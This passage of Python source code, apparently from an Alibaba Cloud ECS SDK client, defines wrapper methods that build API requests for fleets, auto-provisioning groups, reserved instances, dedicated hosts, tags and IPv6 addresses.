'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DiskId": disk_id, "ResourceOwnerAccount": resource_owner_account, "PerformanceLevel": performance_level, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_auto_provisioning_group( self, resource_owner_id=None, terminate_instances_with_expiration=None, region_id=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None, pay_as_you_go_target_capacity=None, total_target_capacity=None, spot_target_capacity=None, max_spot_price=None, auto_provisioning_group_name=None): api_request = APIRequest('ModifyAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "RegionId": region_id, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id, "PayAsYouGoTargetCapacity": pay_as_you_go_target_capacity, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "MaxSpotPrice": max_spot_price, "AutoProvisioningGroupName": auto_provisioning_group_name} return self._handle_request(api_request).result def describe_auto_provisioning_groups( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_auto_provisioning_group_status=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_auto_provisioning_group_id=None, auto_provisioning_group_name=None): api_request = APIRequest('DescribeAutoProvisioningGroups', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, 
"AutoProvisioningGroupStatus": list_of_auto_provisioning_group_status, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": list_of_auto_provisioning_group_id, "AutoProvisioningGroupName": auto_provisioning_group_name} repeat_info = { "AutoProvisioningGroupStatus": ( 'AutoProvisioningGroupStatus', 'list', 'str', None), "AutoProvisioningGroupId": ( 'AutoProvisioningGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_auto_provisioning_group_instances( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DescribeAutoProvisioningGroupInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def delete_auto_provisioning_group( self, resource_owner_id=None, region_id=None, terminate_instances=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DeleteAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "TerminateInstances": terminate_instances, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def create_auto_provisioning_group( self, resource_owner_id=None, auto_provisioning_group_type=None, description=None, terminate_instances_with_expiration=None, resource_group_id=None, spot_allocation_strategy=None, region_id=None, terminate_instances=None, pay_as_you_go_allocation_strategy=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, list_of_launch_template_config=None, valid_until=None, spot_instance_interruption_behavior=None, launch_template_id=None, resource_owner_account=None, owner_account=None, spot_instance_pools_to_use_count=None, owner_id=None, launch_template_version=None, pay_as_you_go_target_capacity=None, total_target_capacity=None, spot_target_capacity=None, valid_from=None, auto_provisioning_group_name=None, max_spot_price=None): api_request = APIRequest('CreateAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoProvisioningGroupType": auto_provisioning_group_type, "Description": description, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "ResourceGroupId": resource_group_id, "SpotAllocationStrategy": spot_allocation_strategy, "RegionId": region_id, "TerminateInstances": terminate_instances, "PayAsYouGoAllocationStrategy": pay_as_you_go_allocation_strategy, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "LaunchTemplateConfig": list_of_launch_template_config, "ValidUntil": valid_until, "SpotInstanceInterruptionBehavior": spot_instance_interruption_behavior, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": 
resource_owner_account, "OwnerAccount": owner_account, "SpotInstancePoolsToUseCount": spot_instance_pools_to_use_count, "OwnerId": owner_id, "LaunchTemplateVersion": launch_template_version, "PayAsYouGoTargetCapacity": pay_as_you_go_target_capacity, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "ValidFrom": valid_from, "AutoProvisioningGroupName": auto_provisioning_group_name, "MaxSpotPrice": max_spot_price} repeat_info = { "LaunchTemplateConfig": ( 'LaunchTemplateConfig', 'list', 'dict', [ ('InstanceType', 'str', None, None), ('MaxPrice', 'str', None, None), ('VSwitchId', 'str', None, None), ('WeightedCapacity', 'str', None, None), ('Priority', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_auto_provisioning_group_history( self, resource_owner_id=None, start_time=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DescribeAutoProvisioningGroupHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def report_instances_status( self, reason=None, resource_owner_id=None, description=None, start_time=None, region_id=None, list_of_disk_id=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, list_of_instance_id=None, list_of_device=None): api_request = APIRequest('ReportInstancesStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "Reason": reason, "ResourceOwnerId": resource_owner_id, "Description": description, "StartTime": start_time, "RegionId": region_id, "DiskId": list_of_disk_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "Device": list_of_device} repeat_info = {"DiskId": ('DiskId', 'list', 'str', None), "InstanceId": ('InstanceId', 'list', 'str', None), "Device": ('Device', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_fleet( self, resource_owner_id=None, terminate_instances_with_expiration=None, on_demand_target_capacity=None, region_id=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None, total_target_capacity=None, spot_target_capacity=None, max_spot_price=None): api_request = APIRequest('ModifyFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "OnDemandTargetCapacity": on_demand_target_capacity, "RegionId": region_id, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "MaxSpotPrice": max_spot_price} 
return self._handle_request(api_request).result def describe_fleets( self, resource_owner_id=None, page_number=None, fleet_name=None, list_of_fleet_status=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_fleet_id=None): api_request = APIRequest('DescribeFleets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "FleetName": fleet_name, "FleetStatus": list_of_fleet_status, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": list_of_fleet_id} repeat_info = {"FleetStatus": ('FleetStatus', 'list', 'str', None), "FleetId": ('FleetId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_fleet_instances( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DescribeFleetInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def describe_fleet_history( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DescribeFleetHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def delete_fleet( self, resource_owner_id=None, region_id=None, terminate_instances=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DeleteFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "TerminateInstances": terminate_instances, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def create_fleet( self, resource_owner_id=None, fleet_type=None, description=None, terminate_instances_with_expiration=None, on_demand_target_capacity=None, fleet_name=None, spot_allocation_strategy=None, region_id=None, terminate_instances=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, list_of_launch_template_config=None, valid_until=None, fill_gap_with_on_demand=None, spot_instance_interruption_behavior=None, launch_template_id=None, resource_owner_account=None, owner_account=None, spot_instance_pools_to_use_count=None, owner_id=None, launch_template_version=None, total_target_capacity=None, on_demand_allocation_strategy=None, spot_target_capacity=None, valid_from=None, max_spot_price=None): api_request = APIRequest('CreateFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "FleetType": fleet_type, "Description": description, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "OnDemandTargetCapacity": on_demand_target_capacity, 
"FleetName": fleet_name, "SpotAllocationStrategy": spot_allocation_strategy, "RegionId": region_id, "TerminateInstances": terminate_instances, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "LaunchTemplateConfig": list_of_launch_template_config, "ValidUntil": valid_until, "FillGapWithOnDemand": fill_gap_with_on_demand, "SpotInstanceInterruptionBehavior": spot_instance_interruption_behavior, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SpotInstancePoolsToUseCount": spot_instance_pools_to_use_count, "OwnerId": owner_id, "LaunchTemplateVersion": launch_template_version, "TotalTargetCapacity": total_target_capacity, "OnDemandAllocationStrategy": on_demand_allocation_strategy, "SpotTargetCapacity": spot_target_capacity, "ValidFrom": valid_from, "MaxSpotPrice": max_spot_price} repeat_info = { "LaunchTemplateConfig": ( 'LaunchTemplateConfig', 'list', 'dict', [ ('InstanceType', 'str', None, None), ('MaxPrice', 'str', None, None), ('VSwitchId', 'str', None, None), ('WeightedCapacity', 'str', None, None), ('Priority', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_reserved_instance_attribute( self, resource_owner_id=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, reserved_instance_id=None, reserved_instance_name=None): api_request = APIRequest('ModifyReservedInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ReservedInstanceId": reserved_instance_id, "ReservedInstanceName": reserved_instance_name} return self._handle_request(api_request).result def purchase_reserved_instances_offering( self, resource_owner_id=None, client_token=None, description=None, resource_group_id=None, region_id=None, scope=None, instance_type=None, period=None, resource_owner_account=None, owner_account=None, owner_id=None, period_unit=None, offering_type=None, zone_id=None, reserved_instance_name=None, instance_amount=None): api_request = APIRequest('PurchaseReservedInstancesOffering', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "ResourceGroupId": resource_group_id, "RegionId": region_id, "Scope": scope, "InstanceType": instance_type, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit, "OfferingType": offering_type, "ZoneId": zone_id, "ReservedInstanceName": reserved_instance_name, "InstanceAmount": instance_amount} return self._handle_request(api_request).result def modify_reserved_instances( self, resource_owner_id=None, list_of_configuration=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_reserved_instance_id=None): api_request = APIRequest('ModifyReservedInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Configuration": list_of_configuration, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ReservedInstanceId": list_of_reserved_instance_id} 
repeat_info = {"Configuration": ('Configuration', 'list', 'dict', [('ZoneId', 'str', None, None), ('ReservedInstanceName', 'str', None, None), ('InstanceType', 'str', None, None), ('Scope', 'str', None, None), ('InstanceAmount', 'str', None, None), ]), "ReservedInstanceId": ('ReservedInstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_reserved_instances( self, resource_owner_id=None, page_number=None, lock_reason=None, region_id=None, scope=None, page_size=None, instance_type=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None, list_of_reserved_instance_id=None, offering_type=None, zone_id=None, reserved_instance_name=None, list_of_status=None): api_request = APIRequest('DescribeReservedInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "LockReason": lock_reason, "RegionId": region_id, "Scope": scope, "PageSize": page_size, "InstanceType": instance_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id, "ReservedInstanceId": list_of_reserved_instance_id, "OfferingType": offering_type, "ZoneId": zone_id, "ReservedInstanceName": reserved_instance_name, "Status": list_of_status} repeat_info = {"ReservedInstanceId": ('ReservedInstanceId', 'list', 'str', None), "Status": ('Status', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_demands( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, instance_type=None, list_of_tag=None, instance_charge_type=None, dry_run=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None, list_of_demand_status=None, zone_id=None): api_request = APIRequest('DescribeDemands', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InstanceType": instance_type, "Tag": list_of_tag, "InstanceChargeType": instance_charge_type, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id, "DemandStatus": list_of_demand_status, "ZoneId": zone_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "DemandStatus": ('DemandStatus', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def import_snapshot( self, resource_owner_id=None, snapshot_name=None, oss_object=None, region_id=None, oss_bucket=None, resource_owner_account=None, role_name=None, owner_id=None): api_request = APIRequest('ImportSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotName": snapshot_name, "OssObject": oss_object, "RegionId": region_id, "OssBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def export_snapshot( self, resource_owner_id=None, snapshot_id=None, region_id=None, oss_bucket=None, resource_owner_account=None, role_name=None, owner_id=None): api_request = APIRequest('ExportSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { 
"ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "RegionId": region_id, "OssBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def untag_resources( self, resource_owner_id=None, region_id=None, all_=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None, list_of_tag_key=None): api_request = APIRequest('UntagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "All": all_, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type, "TagKey": list_of_tag_key} repeat_info = {"ResourceId": ('ResourceId', 'list', 'str', None), "TagKey": ('TagKey', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def tag_resources( self, region_id=None, list_of_tag=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('TagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "RegionId": region_id, "Tag": list_of_tag, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "ResourceId": ('ResourceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def list_tag_resources( self, resource_owner_id=None, region_id=None, next_token=None, list_of_tag=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('ListTagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "NextToken": next_token, "Tag": list_of_tag, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "ResourceId": ('ResourceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def accept_inquired_system_event( self, event_id=None, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('AcceptInquiredSystemEvent', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": event_id, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def redeploy_instance( self, resource_owner_id=None, force_stop=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('RedeployInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ForceStop": force_stop, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": 
instance_id} return self._handle_request(api_request).result def unassign_ipv6_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None, list_of_ipv6_address=None): api_request = APIRequest('UnassignIpv6Addresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id, "Ipv6Address": list_of_ipv6_address} repeat_info = {"Ipv6Address": ('Ipv6Address', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def assign_ipv6_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, ipv6_address_count=None, owner_account=None, owner_id=None, network_interface_id=None, list_of_ipv6_address=None): api_request = APIRequest('AssignIpv6Addresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "Ipv6AddressCount": ipv6_address_count, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id, "Ipv6Address": list_of_ipv6_address} repeat_info = {"Ipv6Address": ('Ipv6Address', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_topology( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, owner_id=None): api_request = APIRequest('DescribeInstanceTopology', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def renew_dedicated_hosts( self, dedicated_host_ids=None, resource_owner_id=None, client_token=None, region_id=None, period=None, resource_owner_account=None, owner_account=None, owner_id=None, period_unit=None): api_request = APIRequest('RenewDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "RegionId": region_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit} return self._handle_request(api_request).result def release_dedicated_host( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None): api_request = APIRequest('ReleaseDedicatedHost', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_deployment( self, resource_owner_id=None, region_id=None, deployment_set_id=None, resource_owner_account=None, owner_account=None, tenancy=None, dedicated_host_id=None, owner_id=None, instance_id=None, force=None, migration_type=None, affinity=None): api_request = APIRequest('ModifyInstanceDeployment', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": 
resource_owner_id, "RegionId": region_id, "DeploymentSetId": deployment_set_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "InstanceId": instance_id, "Force": force, "MigrationType": migration_type, "Affinity": affinity} return self._handle_request(api_request).result def modify_dedicated_host_auto_renew_attribute( self, duration=None, dedicated_host_ids=None, resource_owner_id=None, period_unit=None, auto_renew=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, owner_id=None): api_request = APIRequest('ModifyDedicatedHostAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "Duration": duration, "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "PeriodUnit": period_unit, "AutoRenew": auto_renew, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_dedicated_host_auto_release_time( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, auto_release_time=None, dedicated_host_id=None, owner_id=None): api_request = APIRequest('ModifyDedicatedHostAutoReleaseTime', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_dedicated_host_attribute( self, resource_owner_id=None, description=None, region_id=None, action_on_maintenance=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None, network_attributes_slb_udp_timeout=None, auto_placement=None, network_attributes_udp_timeout=None): api_request = APIRequest('ModifyDedicatedHostAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "RegionId": region_id, "ActionOnMaintenance": action_on_maintenance, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "NetworkAttributes.SlbUdpTimeout": network_attributes_slb_udp_timeout, "AutoPlacement": auto_placement, "NetworkAttributes.UdpTimeout": network_attributes_udp_timeout} return self._handle_request(api_request).result def describe_dedicated_hosts( self, dedicated_host_ids=None, resource_owner_id=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, owner_id=None, page_number=None, resource_group_id=None, lock_reason=None, region_id=None, page_size=None, zone_id=None, dedicated_host_type=None, list_of_tag=None, status=None): api_request = APIRequest('DescribeDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "LockReason": lock_reason, "RegionId": region_id, "PageSize": page_size, "ZoneId": zone_id, "DedicatedHostType": 
dedicated_host_type, "Tag": list_of_tag, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_dedicated_host_types( self, resource_owner_id=None, supported_instance_type_family=None, region_id=None, dedicated_host_type=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeDedicatedHostTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SupportedInstanceTypeFamily": supported_instance_type_family, "RegionId": region_id, "DedicatedHostType": dedicated_host_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_dedicated_host_auto_renew( self, dedicated_host_ids=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeDedicatedHostAutoRenew', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_dedicated_hosts( self, resource_owner_id=None, client_token=None, description=None, resource_group_id=None, region_id=None, action_on_maintenance=None, list_of_tag=None, dedicated_host_type=None, auto_renew_period=None, period=None, quantity=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, auto_release_time=None, owner_id=None, period_unit=None, auto_renew=None, network_attributes_slb_udp_timeout=None, zone_id=None, auto_placement=None, charge_type=None, network_attributes_udp_timeout=None): api_request = APIRequest('AllocateDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "ResourceGroupId": resource_group_id, "RegionId": region_id, "ActionOnMaintenance": action_on_maintenance, "Tag": list_of_tag, "DedicatedHostType": dedicated_host_type, "AutoRenewPeriod": auto_renew_period, "Period": period, "Quantity": quantity, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "OwnerId": owner_id, "PeriodUnit": period_unit, "AutoRenew": auto_renew, "NetworkAttributes.SlbUdpTimeout": network_attributes_slb_udp_timeout, "ZoneId": zone_id, "AutoPlacement": auto_placement, "ChargeType": charge_type, "NetworkAttributes.UdpTimeout": network_attributes_udp_timeout} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_simulated_system_events( self, resource_owner_id=None, not_before=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None, event_type=None): api_request = APIRequest('CreateSimulatedSystemEvents', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "NotBefore": not_before, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": 
